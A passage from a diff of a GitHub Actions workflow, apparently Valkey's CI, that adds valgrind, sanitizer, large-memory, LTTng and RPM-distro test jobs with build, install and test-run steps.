true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + ./deps/gtest-parallel/gtest-parallel valgrind -- --track-origins=yes --suppressions=./src/valgrind.sup --show-reachable=no --show-possibly-lost=no --leak-check=full --log-file=err.%p.txt ./src/unit/valkey-unit-gtests --valgrind + if grep -qlE '0x[0-9A-Fa-f]+:' err.*.txt 2>/dev/null; then grep -lE '0x[0-9A-Fa-f]+:' err.*.txt | xargs cat; exit 1; fi + elif [ -f ./src/valkey-unit-tests ]; then + valgrind --track-origins=yes --suppressions=./src/valgrind.sup --show-reachable=no --show-possibly-lost=no --leak-check=full --log-file=err.txt ./src/valkey-unit-tests --valgrind + if grep -q 0x err.txt; then cat err.txt; exit 1; fi + fi + test-valgrind-no-malloc-usable-size-test: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'valgrind') && !contains(github.event.inputs.skiptests, 'valkey') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ 
inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make valgrind CFLAGS="-DNO_MALLOC_USABLE_SIZE" SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx valgrind -y + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --valgrind --no-latency --verbose --clients 1 --timeout 2400 --dump-logs ${{github.event.inputs.test_args}} + test-valgrind-no-malloc-usable-size-misc: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'valgrind') && !(contains(github.event.inputs.skiptests, 'modules') && contains(github.event.inputs.skiptests, 'unittest')) + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ 
inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make valgrind all-with-unit-tests CFLAGS="-DNO_MALLOC_USABLE_SIZE" SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx valgrind -y + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --valgrind --no-latency --verbose --clients 1 --timeout 2400 --dump-logs ${{github.event.inputs.test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + ./deps/gtest-parallel/gtest-parallel valgrind -- --track-origins=yes --suppressions=./src/valgrind.sup --show-reachable=no --show-possibly-lost=no --leak-check=full --log-file=err.%p.txt ./src/unit/valkey-unit-gtests --valgrind + if grep -qlE '0x[0-9A-Fa-f]+:' err.*.txt 2>/dev/null; then grep -lE '0x[0-9A-Fa-f]+:' err.*.txt | xargs cat; exit 1; fi + elif [ -f ./src/valkey-unit-tests ]; then + valgrind --track-origins=yes --suppressions=./src/valgrind.sup --show-reachable=no --show-possibly-lost=no --leak-check=full --log-file=err.txt ./src/valkey-unit-tests --valgrind + if grep -q 0x err.txt; then cat err.txt; exit 1; fi + fi + test-sanitizer-address: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 
'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'sanitizer') + timeout-minutes: 1440 + strategy: + fail-fast: false + matrix: + compiler: [gcc, clang] + env: + CC: ${{ matrix.compiler }} + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests OPT=-O3 SANITIZER=address SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx -y + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --accurate --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: 
CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests + fi + # Large-memory tests with sanitizers require 10-14GB RAM due to ASAN/UBSAN overhead. + # GitHub-hosted runners for public repos provide 16GB (ubuntu-latest). + # These tests are borderline - monitoring memory usage to determine if they can run reliably. + test-sanitizer-address-large-memory: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'sanitizer') && + !contains(github.event.inputs.skiptests, 'large-memory') + timeout-minutes: 1440 + strategy: + fail-fast: false + matrix: + compiler: [gcc, clang] + env: + CC: ${{ matrix.compiler }} + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + 
echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - name: Log runner memory + run: free -h + - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests OPT=-O3 SANITIZER=address SERVER_CFLAGS='-Werror' + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx -y + - name: Start memory monitor + run: | + # Track minimum free memory to detect OOM risk + (while true; do + FREE=$(awk '/MemAvailable/ {print $2}' /proc/meminfo) + echo "$FREE" >> /tmp/memfree.log + sleep 5 + done) & + echo $! > /tmp/memmon.pid + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit large_memory=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --large-memory + fi + - name: large memory tests + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --accurate --verbose --dump-logs --clients 1 --large-memory --tags large-memory ${{github.event.inputs.test_args}} + - name: large memory module api tests + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs --clients 1 --large-memory --tags large-memory ${{github.event.inputs.test_args}} + - name: Memory usage summary + if: always() + run: | + kill $(cat /tmp/memmon.pid) 2>/dev/null || true + echo "=== Memory Summary ===" + printf "Total RAM: %.1fGB\n" $(awk '/MemTotal/ {print $2/1024/1024}' /proc/meminfo) + if [ -f /tmp/memfree.log ]; then + MIN_FREE=$(sort -n /tmp/memfree.log | head -1) + printf "Minimum free memory: %.1fGB\n" $(echo 
"$MIN_FREE/1024/1024" | bc -l) + fi + test-sanitizer-undefined: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'sanitizer') + timeout-minutes: 1440 + strategy: + fail-fast: false + matrix: + compiler: [gcc, clang] + env: + CC: ${{ matrix.compiler }} + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests OPT=-O3 SANITIZER=undefined SERVER_CFLAGS='-Werror' LUA_DEBUG=yes USE_LIBBACKTRACE=yes # we (ab)use this flow to also check Lua C API violations + - name: testprep + run: | + sudo 
apt-get update + sudo apt-get install tcl8.6 tclx -y + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --accurate --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate + fi + # Large-memory tests with sanitizers require 10-14GB RAM due to ASAN/UBSAN overhead. + # GitHub-hosted runners for public repos provide 16GB (ubuntu-latest). + # These tests are borderline - monitoring memory usage to determine if they can run reliably. 
+ test-sanitizer-undefined-large-memory: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'sanitizer') && + !contains(github.event.inputs.skiptests, 'large-memory') + timeout-minutes: 1440 + strategy: + fail-fast: false + matrix: + compiler: [gcc, clang] + env: + CC: ${{ matrix.compiler }} + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - name: Log runner memory + run: free -h + - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests OPT=-O3 SANITIZER=undefined SERVER_CFLAGS='-Werror' LUA_DEBUG=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx -y + - name: Start memory monitor + run: | + # Track minimum free memory to detect OOM risk + (while true; do + FREE=$(awk '/MemAvailable/ {print $2}' /proc/meminfo) + echo "$FREE" >> /tmp/memfree.log + sleep 5 + done) & + echo $! 
> /tmp/memmon.pid + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 large_memory=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate --large-memory + fi + - name: large memory tests + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --accurate --verbose --dump-logs --clients 1 --large-memory --tags large-memory ${{github.event.inputs.test_args}} + - name: large memory module api tests + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs --clients 1 --large-memory --tags large-memory ${{github.event.inputs.test_args}} + - name: Memory usage summary + if: always() + run: | + kill $(cat /tmp/memmon.pid) 2>/dev/null || true + echo "=== Memory Summary ===" + printf "Total RAM: %.1fGB\n" $(awk '/MemTotal/ {print $2/1024/1024}' /proc/meminfo) + if [ -f /tmp/memfree.log ]; then + MIN_FREE=$(sort -n /tmp/memfree.log | head -1) + printf "Minimum free memory: %.1fGB\n" $(echo "$MIN_FREE/1024/1024" | bc -l) + fi + test-sanitizer-force-defrag: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'sanitizer') + timeout-minutes: 1440 + strategy: + fail-fast: false + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: 
${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests OPT=-O3 SANITIZER=address DEBUG_FORCE_DEFRAG=yes USE_JEMALLOC=no SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx -y + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --accurate --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit + elif [ -f ./src/valkey-unit-tests ]; then + 
./src/valkey-unit-tests + fi + test-ubuntu-lttng: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'lttng') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + sudo apt-get update && sudo apt-get install lttng-tools lttng-modules-dkms liblttng-ust-dev + cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make -j4 USE_LTTNG=yes USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + 
- name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-rpm-distros-jemalloc: + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'rpm-distros') + strategy: + fail-fast: false + matrix: + include: + - name: test-almalinux8-jemalloc + container: almalinux:8 + install_epel: true + - name: test-almalinux9-jemalloc + container: almalinux:9 + install_epel: true + - name: test-centosstream9-jemalloc + container: quay.io/centos/centos:stream9 + install_epel: true + - name: test-fedoralatest-jemalloc + container: fedora:latest + - name: test-fedorarawhide-jemalloc + container: fedora:rawhide + name: ${{ matrix.name }} + runs-on: ubuntu-latest + container: ${{ matrix.container }} + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo 
"GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install EPEL + if: matrix.install_epel + run: dnf -y install epel-release + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + dnf -y install gcc make procps-ng which /usr/bin/kill /usr/bin/awk + cd libbacktrace && ./configure && make && make install + - name: make + run: make -j SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: dnf -y install tcl tcltls + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster 
${{github.event.inputs.cluster_test_args}} + test-rpm-distros-tls-module: + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'tls') + strategy: + fail-fast: false + matrix: + include: + - name: test-almalinux8-tls-module + container: almalinux:8 + install_epel: true + - name: test-almalinux9-tls-module + container: almalinux:9 + install_epel: true + - name: test-centosstream9-tls-module + container: quay.io/centos/centos:stream9 + install_epel: true + - name: test-fedoralatest-tls-module + container: fedora:latest + - name: test-fedorarawhide-tls-module + container: fedora:rawhide + name: ${{ matrix.name }} + runs-on: ubuntu-latest + container: ${{ matrix.container }} + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - 
name: Install EPEL + if: matrix.install_epel + run: dnf -y install epel-release + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + dnf -y install make gcc openssl-devel openssl procps-ng which /usr/bin/kill /usr/bin/awk + cd libbacktrace && ./configure && make && make install + - name: make + run: make -j BUILD_TLS=module SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + dnf -y install tcl tcltls + ./utils/gen-test-certs.sh + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: | + ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs --tls-module --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: | + CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs --tls-module --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: | + ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: | + ./runtest-cluster --tls-module ${{github.event.inputs.cluster_test_args}} + test-rpm-distros-tls-module-no-tls: + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'tls') + strategy: + fail-fast: false + matrix: + include: + - name: test-almalinux8-tls-module-no-tls + container: almalinux:8 + 
